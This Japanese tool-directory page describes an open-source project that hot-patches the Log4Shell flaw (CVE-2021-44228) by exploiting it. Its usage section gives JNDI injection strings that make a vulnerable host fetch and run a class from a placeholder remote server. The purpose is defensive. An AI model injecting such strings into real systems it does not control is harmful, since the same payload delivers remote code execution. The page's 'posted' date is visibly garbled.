Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2021-44228-qingteng-online-patch — 脆弱性そのものを利用して CVE-2021-44228 をホットパッチする | Kitploit
ツール/GitHubGitHub/qingtengyun/cve-2021-44228-qingteng-online-patch
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールインシデントレスポンス
GitHubqingtengyun/cve-2021-44228-qingteng-online-patch

cve-2021-44228-qingteng-online-patch

脆弱性そのものを利用して CVE-2021-44228 をホットパッチする

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
2544年前Kitploit レビュー済み

cve-2021-44228-qingteng-online-patch

これは何か

脆弱性そのものを利用してCVE-2021-44228をホットパッチします。

使用方法

CVE-2021-44228に対して脆弱である可能性のある場所に、以下のコードを注入してください。

root@kitploit:~
${jndi:ldap://your-own-server/patch}

パッチ適用中のMITM攻撃を防ぐには、以下のペイロードが推奨されます。ただし、古いバージョンのJavaとの互換性は低くなります。

root@kitploit:~
${jndi:ldap://your-own-server/any_string_except_patch}

自分でサーバーを立てる

  1. 最新のリリースをダウンロードしてください

  2. Hotfix.classを自分のサーバーでホストしたい場合は、システム環境変数LOG4J_HOTFIX_HTTP_PATHとLOG4J_HOTFIX_HTTPS_PATHを指定してください

ビルド

Hotfix.javaは、最大限の互換性を得るためにJDK6でコンパイルする必要があることに注意してください。

ツールをダウンロード